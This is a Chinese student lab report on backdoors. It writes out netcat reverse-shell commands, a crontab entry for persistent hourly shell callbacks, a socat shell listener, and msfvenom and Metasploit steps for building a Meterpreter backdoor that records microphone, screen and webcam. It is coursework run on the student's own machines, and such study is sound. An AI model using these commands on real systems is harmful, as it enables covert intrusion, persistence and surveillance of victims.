20155338《网络对抗》Exp2 后门原理与实践

一、基础问题

（1）例举你能想到的一个后门进入到你系统中的可能方式？

答：游览网站中附带的广告或弹出的不正规软件。

（2）例举你知道的后门如何启动起来(win及linux)的方式？

答：1．操作系统自带服务； 2．网络协议捆绑； 3．软件编写者制作； 4．漏洞攻击后放置；

（3）Meterpreter有哪些给你映像深刻的功能

答：录屏，提升权限和录音。

（4）如何发现自己有系统有没有被安装后门

答：用网络命令来看计算机所连接的设备有没有陌生软件，查看IP地址和端口状态，以达到控制自己计算机的目的

二、实验过程

一、Win获取Linux shell

在cmd中进入ncat文件夹中，使用ncat.exe -l -p 5338命令运行ncat.exe监听5338端口

Linux在终端窗口使用nc Win的IP 端口号 -e /bin/sh命令去连接Win的5338端口，连接成功后就可以在Win的cmd窗口中输入Linux的命令，此时已经获取了Linux的shell。

二、Linux获取Win shell

Linux在终端中使用ifconfig命令查看自己的IP，使用nc -l -p 5338命令监听5338端口。

Win在cmd窗口使用ncat.exe -e cmd.exe linux的IP 端口命令去连接Linux的5338端口。

连接成功后就可以在Linux的终端窗口中输入Win的命令，此时已经获取了Win的shell。

三、使用nc传输数据

(1)Win使用ncat.exe -l 5338命令监听5338端口。

(2)Linux在终端窗口使用nc Win的IP 端口号命令去连接Win的5338端口。

(3)双向传输数据。

四、nc定时启动

Win使用ncat.exe -l -p 5338命令运行ncat.exe监听5338端口。

Linux使用crontab -e命令，在最后一行添加分钟数 * * * * /bin/netcat Win的IP 端口 -e /bin/sh，在每个小时的这个分钟反向连接Windows主机的端口。

五、实践SoCat的功能

在Win下，依次打开控制面板，管理工具，任务计划程序，然后选择创建一个新任务，填写好任务名称；新建一个触发器，并设置触发器的相关参数；新建操作，设置如图相关参数tcp-listen:端口号 exec:cmd.exe,pty,stderr

Linux下使用socat - tcp:Win的IP:端口命令，此时已经获取了Win的shell，可以查看想知道的东西。

六、实践MSF Meterpreter功能

Linux下使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=Linux的IP LPORT=端口 -f exe > 20155338_backdoor.exe（20155338_backdoor.exe是会生成的后门文件的名字）命令生成后门。

将后门传送到Win主机上（因为我的win主机防护系统太牛逼了，所以我传到了win7的虚拟机上）。

Linux使用msfconsole命令进入控制台，并进行一系列payload、IP、端口的设置。

在msf的命令下输入命令use exploit/multi/handler,payload设置命令set payload windows/meterpreter/reverse_tcp，继续设置IP(此处设置虚拟机的Linux的IP地址）和端口

Linux使用exploit命令开始监听，此时在Win上执行后门程序。

Linux已经和Win连接好了，可以开始尝试不同的功能了：

录音功能：record_mic
录屏功能：screenshot
拍照功能：webcam_snap（因为当时我的网速实在太差，所以图像只出了一部分）。

七、实验感想和体会

本次实验让我体会到了黑客的一丝味道，做的津津有味，以前听说别人能远程控制电脑什么的，现在终于感觉自己入了门，日后还有进行更深入的学习。同时，这次实验也让我意识到了我们日常生活中，游览网页，可能后门木马到处都存在，让我重视了定期对电脑检查的重要性。